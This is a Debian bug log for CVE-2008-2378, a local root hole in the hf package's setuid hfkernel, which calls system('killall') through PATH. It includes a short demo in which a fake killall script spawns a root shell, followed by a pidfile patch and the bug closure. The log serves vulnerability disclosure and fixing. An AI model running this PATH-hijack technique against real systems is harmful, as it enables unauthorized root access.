Debian Bug report logs - #504182
hf: CVE-2008-2378 insecure system call leading to local root

version graph

Package: hf; Maintainer for hf is (unknown);

Reported by: Nico Golde <nion@debian.org>

Date: Sat, 1 Nov 2008 13:36:01 UTC

Severity: grave

Tags: security

Fixed in version hf/0.8-8.1

Done: Nico Golde <nion@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian Hamradio Maintainers <debian-hams@lists.debian.org>:
Bug#504182; Package hf. (Sat, 01 Nov 2008 13:36:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
New Bug report received and forwarded. Copy sent to Debian Hamradio Maintainers <debian-hams@lists.debian.org>. (Sat, 01 Nov 2008 13:36:03 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: submit@bugs.debian.org
Subject: [skx@debian.org: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit]
Date: Sat, 1 Nov 2008 14:34:13 +0100
[Message part 1 (text/plain, inline)]
Source: hf
Severity: grave
Tags: security

----- Forwarded message from Steve Kemp <skx@debian.org> -----

From: Steve Kemp <skx@debian.org>
To: secure-testing-team@lists.alioth.debian.org
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Cc: hf@packages.debian.org, team@security.debian.org
Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit


 The hf package, Described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel


  Unfortunately the hfkernel program contains a trivial root hole:

int main(int argc, char *argv[])
{
        // snip
        while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
            switch (c) {

            // snip

                case 'k':
                    system ("killall hfkernel");

            //
}

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)


  This has been given the identifier CVE-2008-2378.

  Below is the patch that I've come up with to fix this hole, which
 is a simple pidfile approach.  Unless anybody has any comments
 I'll upload a fix for Etch on Monday/Tuesday.

Steve
--


--- hf-0.8/hfkernel/main.c	2006-12-22 10:44:23.000000000 +0000
+++ hf-0.8.orig/hfkernel/main.c	2008-11-01 10:33:44.000000000 +0000
@@ -7,19 +7,7 @@
  *      Copyright (C) 1996  Thomas Sailer (sailer@ife.ee.ethz.ch)
  *      Swiss Federal Institute of Technology (ETH), Electronics Lab
  *	modified by Gnther Montag
- *      This program is free software; you can redistribute it and/or modify
- *      it under the terms of the GNU General Public License as published by
- *      the Free Software Foundation; either version 2 of the License, or
- *      (at your option) any later version.
- *
- *      This program is distributed in the hope that it will be useful,
- *      but WITHOUT ANY WARRANTY; without even the implied warranty of
- *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *      GNU General Public License for more details.
- *
- *      You should have received a copy of the GNU General Public License
- *      along with this program; if not, write to the Free Software
- *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
  */
@@ -78,6 +66,11 @@
 #include "alsa.h"
 #endif /* HAVE_ALSA_ASOUNDLIB_H */
 
+#ifndef PID_FILE
+# define PID_FILE "/var/run/hfkernel.pid"
+#endif
+
+
 /* --------------------------------------------------------------------- */
 
 /* these variables take hfkernel's options */
@@ -154,6 +147,49 @@
 	}
 }
 
+void kill_daemon()
+{
+	FILE *f;
+	int pid;
+
+	if (!(f = fopen (PID_FILE, "r")))
+        {
+                 errstr( SEV_FATAL, "Failed to read from PID file");
+                  exit(1);
+        }
+	fscanf (f, "%d", &pid);
+	fclose (f);
+
+        kill( SIGKILL, pid );
+        unlink( PID_FILE );
+        exit(1);
+}
+
+
+int write_pid()
+{
+	char buf[20];
+	int fd;
+	long pid;
+
+	if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1)
+	{
+                errstr (SEV_FATAL, "cannot open pidfile for writing ");
+                exit(1);
+	}
+        else
+        {
+		pid = getpid ();
+		snprintf (buf, sizeof (buf), "%ld", (long) pid);
+		if (write (fd, buf, strlen (buf)) != strlen (buf))
+                {
+                       errstr (SEV_FATAL, "cannot write to pidfile ");
+                       exit(1);
+                }
+		close(fd);
+	}
+	return pid;
+}
 
 /* --------------------------------------------------------------------- */
 
@@ -529,8 +565,8 @@
                     break;
 
                 case 'k':
-                    system ("killall hfkernel");
-
+                     kill_daemon();
+                     break;
                 case 'l':
                     logging = 1;
                     break;
@@ -635,6 +671,7 @@
 
                 exit(1);
         }
+
         if (logging)
                 openlog("hfkernel", LOG_PID, LOG_DAEMON);
 	printf("hfkernel %s starting...\n", PACKAGE_VERSION);
@@ -699,6 +736,8 @@
 
 	printf("Note: hfkernel is only part of the hf package.\n"); 
 	printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n");
+        write_pid();
+
 	start_io_thread();
 	exit(0); }
 

_______________________________________________
Secure-testing-team mailing list
Secure-testing-team@lists.alioth.debian.org
http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team

----- End forwarded message -----

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Message part 2 (application/pgp-signature, inline)]

Changed Bug title to `hf: CVE-2008-2378 insecure system call leading to local root' from `[skx@debian.org: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit]'. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sat, 01 Nov 2008 13:42:02 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian Hamradio Maintainers <debian-hams@lists.debian.org>:
Bug#504182; Package hf. (Wed, 05 Nov 2008 20:33:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Hamradio Maintainers <debian-hams@lists.debian.org>. (Wed, 05 Nov 2008 20:33:05 GMT) Full text and rfc822 format available.

Message #12 received at 504182@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: 504182@bugs.debian.org
Subject: intent to NMU
Date: Wed, 5 Nov 2008 21:23:14 +0100
[Message part 1 (text/plain, inline)]
Hi,
I intent to upload an NMU to fix this bug.
debdiff attached and archived on:
http://people.debian.org/~nion/nmu-diff/hf-0.8-8_0.8-8.1.patch

Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[hf-0.8-8_0.8-8.1.patch (text/x-diff, attachment)]
[Message part 3 (application/pgp-signature, inline)]

Reply sent to Nico Golde <nion@debian.org>:
You have taken responsibility. (Wed, 05 Nov 2008 21:15:19 GMT) Full text and rfc822 format available.

Notification sent to Nico Golde <nion@debian.org>:
Bug acknowledged by developer. (Wed, 05 Nov 2008 21:15:23 GMT) Full text and rfc822 format available.

Message #17 received at 504182-close@bugs.debian.org (full text, mbox):

From: Nico Golde <nion@debian.org>
To: 504182-close@bugs.debian.org
Subject: Bug#504182: fixed in hf 0.8-8.1
Date: Wed, 05 Nov 2008 21:02:48 +0000
Source: hf
Source-Version: 0.8-8.1

We believe that the bug you reported is fixed in the latest version of
hf, which is due to be installed in the Debian FTP archive:

hf_0.8-8.1.diff.gz
  to pool/main/h/hf/hf_0.8-8.1.diff.gz
hf_0.8-8.1.dsc
  to pool/main/h/hf/hf_0.8-8.1.dsc
hf_0.8-8.1_amd64.deb
  to pool/main/h/hf/hf_0.8-8.1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 504182@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde <nion@debian.org> (supplier of updated hf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 05 Nov 2008 21:19:58 +0100
Source: hf
Binary: hf
Architecture: source amd64
Version: 0.8-8.1
Distribution: unstable
Urgency: high
Maintainer: Debian Hamradio Maintainers <debian-hams@lists.debian.org>
Changed-By: Nico Golde <nion@debian.org>
Description: 
 hf         - amateur-radio protocol suite using a soundcard as a modem
Closes: 504182
Changes: 
 hf (0.8-8.1) unstable; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Fix local root security hole that is caused by an insecure call
     to the system function, thanks Steve Kemp for the patch
     (CVE-2008-2378; Closes: #504182).
Checksums-Sha1: 
 551137d242d3aa54fdc9d5e4860baf3a6d901ac5 1212 hf_0.8-8.1.dsc
 1f0eec520ca27db2fbd2efc8cf6b496ce0ad5197 126128 hf_0.8-8.1.diff.gz
 abcca04dc39871c43c84825cb9fea847b72d6b4c 681254 hf_0.8-8.1_amd64.deb
Checksums-Sha256: 
 36be9e4b38cd3b9428164d80817b46c10b7e7f4eb5fe9eee30c013559e9b1cec 1212 hf_0.8-8.1.dsc
 90728620ec02b70a4236d4f63bbfe86f04ec35c3db09c8f9048ce48f322eb2a8 126128 hf_0.8-8.1.diff.gz
 abb2ef7f75c5413daa5ad35b77ac056ed8ae135d6e50dac49de8ae3ff2db085e 681254 hf_0.8-8.1_amd64.deb
Files: 
 d6dc9fe5aaf6a9c5dd048e155b5a25f4 1212 hamradio optional hf_0.8-8.1.dsc
 a87b6c21a254bcd533d8e7c4b4f7f996 126128 hamradio optional hf_0.8-8.1.diff.gz
 92ed2485529738970c0a35b8be59cdb5 681254 hamradio optional hf_0.8-8.1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkSASQACgkQHYflSXNkfP96nwCghgmz14682qg/7PCprto1wm25
z9YAoI776e+MhOJNjOQ1wEiKajUhHtiE
=7zZJ
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 19 Dec 2008 07:33:33 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Mon Apr 21 00:10:42 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.